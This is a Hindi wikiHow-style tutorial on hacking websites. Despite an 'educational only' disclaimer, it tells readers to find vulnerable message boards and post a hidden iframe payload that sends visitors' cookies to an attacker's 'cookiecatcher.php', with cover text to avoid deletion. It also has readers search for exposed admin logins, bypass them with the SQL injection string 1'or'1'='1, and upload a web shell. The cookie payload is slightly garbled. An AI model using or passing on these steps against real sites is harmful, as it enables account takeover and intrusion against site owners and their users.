कैसे किसी वेबसाइट को हैक करें

आर्टिकल डाउनलोड करें
आर्टिकल डाउनलोड करें

कभी आपने यह जानना चाहा है कि किसी वेबसाइट को किस तरह हैक किया जा सकता है? हालांकि प्रत्येक साइट को हैक कर पाना तो संभव नहीं होता है, मगर आप मेसेज बोर्ड जैसी किसी वलनरेबल (vulnerable) साइट को हैक कर सकते हैं। विकिहाउ के इस आर्टिकल में यह सिखाया गया है कि किस तरह से क्रॉस स्क्रिप्ट राइटिंग तथा इंजेक्शन अटैक्स के जरिये से आप किसी साइट को हैक कर सकते हैं। इसमें आपको ये टिप्स भी दी गई हैं कि आप सफलता पाने के लिए अपने आप को किस तरह सेट कर सकते हैं। नोट: यह ट्यूटोरियल सिर्फ एजुकेशनल उद्देश्य से है। इससे या तो लोगों को व्हाइट हैट हैकिंग सीखने में सहायता मिलेगी या यह देख कर कि हैकर्स किस तरह काम करते हैं, लोग अपनी साइट्स की बेहतर सुरक्षा कर सकेंगे। इस ट्यूटोरियल में हैकिंग के दो तरीके समझाये गए हैं, क्रॉस स्क्रिप्ट राइटिंग तथा SQL इंजेक्शन।

विधि 1
विधि 1 का 3:

क्रॉस स्क्रिप्ट राइटिंग का इस्तेमाल करना

आर्टिकल डाउनलोड करें
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    कोई ऐसी हैक करने योग्य (vulnerable) साइट खोजिए जहां आप कंटेन्ट पोस्ट कर सकते हों: कोई मेसेज बोर्ड इसका बढ़िया उदाहरण होगा। याद रखिए, अगर यह साइट क्रॉस स्क्रिप्ट राइटिंग के लिए वलनरेबल नहीं होगी, तब यह तरीका काम नहीं करेगा।
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    आपको उस "पोस्ट" में एक विशेष कोड टाइप करना होगा जो कि उस उनका सभी का डेटा कैप्चर कर लेगा, जो वहाँ क्लिक करेंगे।
    • आपको यह देखने के लिए टेस्ट करना होगा कि क्या सिस्टम उस कोड को फ़िल्टर आउट कर देता है। पोस्ट करिए 
      <script>window.alert("test")</script>
      अगर आपके पोस्ट पर क्लिक करने से कोई अलर्ट बॉक्स सामने आ जाता है, तब साइट अटैक के लिए वलनरेबल है।
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    इस अटैक का लक्ष्य है कि यूज़र्स की कुकीज़ को कैप्चर कर लिया जाये, जिससे आपको उनके वलनरेबल लॉगइन वाली वेबसाइट्स के अकाउंट्स में एक्सेस मिल सके। आपको एक कुकी कैचर की ज़रूरत पड़ेगी, जो आपके टार्गेट की कुकीज़ को कैप्चर करके उनको रीराउट (reroute) कर देगा। कैचर को ऐसी वेबसाइट में अपलोड कर दीजिये जिसमें आपकी एक्सेस हो, और जो अपलोड द्वारा रिमोट कोड एक्ज़ीक्यूशन के लिए वलनरेबल हो।
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    पोस्ट में एक उचित कोड इनपुट करिए जो कि कुकीज़ को कैप्चर करके आपकी साइट पर भेज देगा। संदेह को कम करने के लिए आप चाहेंगे, कि कोड के बाद कुछ टेक्स्ट भी रखें, जिससे कि आपकी पोस्ट डिलीट न कर दी जाये।
    • कोड का एक उदाहरण हो सकता है
      <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    इसके बाद आप कुकी जानकारी, जिसे आपकी वेबसाइट पर सेव किया जाना चाहिए, का इस्तेमाल मनचाहे उद्देश्य के लिए कर सकते हैं।
विधि 2
विधि 2 का 3:

इंजेक्शन अटैक्स को एक्ज़ीक्यूट करना (Executing Injection Attacks)

आर्टिकल डाउनलोड करें
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    आपको कोई ऐसी साइट खोजनी होगी, जो आसानी से एक्सेसिबल एडमिन लॉगइन के कारण वलनरेबल हो। अपने मनपसंद सर्च इंजन पर admin login.asp या admin login.php खोजने की कोशिश करिए।
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    यूजरनेम में एडमिन टाइप करिए तथा विभिन्न नंबर स्ट्रिंग्स में से किसी एक को पासवर्ड की तरह इस्तेमाल करिए। यह विभिन्न स्ट्रिंग्स में कोई भी एक हो सकता है मगर 1'या'1'='1 या 2'='2 एक कॉमन उदाहरण है।
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    इसमें शायद थोड़ी ट्रायल और एरर की ज़रूरत पड़ेगी।
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    यह मानते हुये कि वेबसाइट अटैक के लिए वलनरेबल है, कभी न कभी आपको वह स्ट्रिंग मिल ही जाएगी जिससे आप वेबसाइट में एडमिन एक्सेस पा सकेंगे। उसके बाद एडमिनिस्ट्रेटर के रूप में लॉग इन हो कर आप आगे की कार्यवाहियाँ कर सकते हैं, जैसे कि अगर आप फ़ाइल अपलोड कर सकेंगे तो सर्वर साइड एक्सेस पाने के लिए वेब शेल को अपलोड कर सकेंगे।
विधि 3
विधि 3 का 3:

सफलता के लिए सेट अप करना

आर्टिकल डाउनलोड करें
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    अगर आप सचमुच में सीखना चाहते हैं कि किस प्रकार वेबसाइट्स को हैक किया जाये, तब आपको समझना होगा कि कंप्यूटर और अन्य टेक्नॉलॉजी किस प्रकार काम करती है। Python, PHP (सर्वर-साइड वलनरेबिलिटीज़ को एक्सप्लोइट करने के लिए आवश्यक) या SQL जैसी प्रोग्रामिंग लैंगवेजेज़ का इस्तेमाल करना सीखिये, ताकि आप कम्प्यूटर्स पर बेहतर नियंत्रण बना सकें और सिस्टम्स में वलनरेबिलिटीज़ को पहचान सकें।
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    अगर आप खास तौर पर वेबसाइट्स को ही हैक करना चाहते हैं, तब आपको HTML तथा JavaScript की अच्छी समझ होनी चाहिए। इसे सीखने में समय लग सकता है, मगर इसको मुफ़्त में सीखने के लिए इन्टरनेट पर बहुत से तरीके उपलब्ध हैं, इसलिए अगर आप चाहेंगे, तब आपको निस्संदेह इसके अनेक अवसर मिल जाएँगे।
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    व्हाइटहैट्स वे हैकर होते हैं जो अपनी पावर का इस्तेमाल अच्छाई के लिए, सिक्यूरिटी वलनरेबिलिटीज़ को एक्सपोज़ करने के लिए, और इंटनेट को सभी के लिए एक बेहतर जगह बनाने के लिए करते हैं। अगर आप हैक करना इसलिए सीख रहे हैं ताकि अपनी पावर का इस्तेमाल भलाई के लिए कर सकें या आप अपनी वेबसाइट को प्रोटेक्ट करना चाहते हैं, तब शायद सुझाव आदि पाने के लिए कुछ करेंट व्हाइटहैट्स से कॉन्टेक्ट करना चाहेंगे।
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    अगर आप हैक करना सीखना चाहते हैं या केवल ख़ुद को प्रोटेक्ट करना चाहते हैं, आपको बहुत रिसर्च करनी पड़ेगी। ऐसे अनेक तरीके हैं जिनसे वेबसाइट्स वलनरेबल हो सकती हैं और इन तरीकों की लिस्ट लगातार बदलती रहती है, इसलिए आपको लगातार सीखते रहना पड़ेगा।
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    चूंकि संभावित हैक्स की लिस्ट हमेशा बदलती रहती है, और नई वलनरेबिलिटीज़ की खोज होती रहती है, आपको यह सुनिश्चित करना होगा कि आप अप टू डेट रहें। केवल इसलिए कि आप अभी किसी एक प्रकार के हैक से प्रोटेक्टेड हैं इसका यह मतलब नहीं है कि आप भविष्य में भी सुरक्षित रहेंगे।

सलाह

  • अनेक ऐसी सलाहें पाने के लिए, जो आपकी मदद करेंगी, आप हैकर फ़ोरम्स में जाइए।
  • यह ट्यूटोरियल शुद्ध रूप से केवल एजुकेशनल उद्देश्य से है। इससे या तो लोगों को व्हाइट हैट हैकिंग सीखने में सहायता मिलेगी या यह देख कर कि हैकर्स किस तरह काम करते हैं, लोग अपनी साइट्स की बेहतर सुरक्षा कर सकेंगे।

चेतावनी

  • इस लेख को पढ़ने के तुरंत बाद आप हैकर नहीं बन जाएँगे। आपको अपनी स्किल्स को एक्सप्लोर करना है, और अभ्यास करते ही रहना है।

संबंधित लेखों

कैसे
अपने सिम कार्ड से अपना मोबाइल नंबर पता करें
कैसे
उस व्यक्ति को कॉल करें जिसने आपका नंबर ब्लॉक कर दिया है (Call a Person That Has Blocked Your Number)
कैसे
इंस्टाग्राम पासवर्ड रीसेट करें (Reset Your Instagram Password)
कैसे
इंस्टाग्राम पर किसी लड़की से बात शुरू करें (Start a Conversation with a Girl on Instagram)
कैसे
ब्लॉक (block) किए हुये नंबर पर वापस कॉल करें
WhatsApp टिप्स: फेक नंबर से व्हाट्सअप चलायें
कैसे
फोटो की मदद से किसी की खोज करें (Search and Find About Someone Using Image Easily)
कैसे
यूट्यूब से गाने डाउनलोड करें (Kaise YouTube se Gaane Download Kare)
कैसे
PC में हिंदी में टाइप करें (Type in Hindi on a PC)
कैसे
लड़कियों से ऑनलाइन बातें करें (Talk to Girls Online)
कैसे
एंड्राइड में सेफ मोड बंद करें
कैसे
HTML का इस्तेमाल करके एक वेब पेज तैयार करें (Create a Simple Web Page with HTML)
कैसे
Pirate Bay से डाउनलोड करें (Download from Pirate Bay)
कैसे
इंस्टाग्राम अकाउंट को डिलीट करें

विकीहाउ के बारे में

अन्य भाषाओं में
सभी लेखकों को यह पृष्ठ बनाने के लिए धन्यवाद दें जो २१,३७० बार पढ़ा गया है।

यह लेख ने कैसे आपकी मदद की?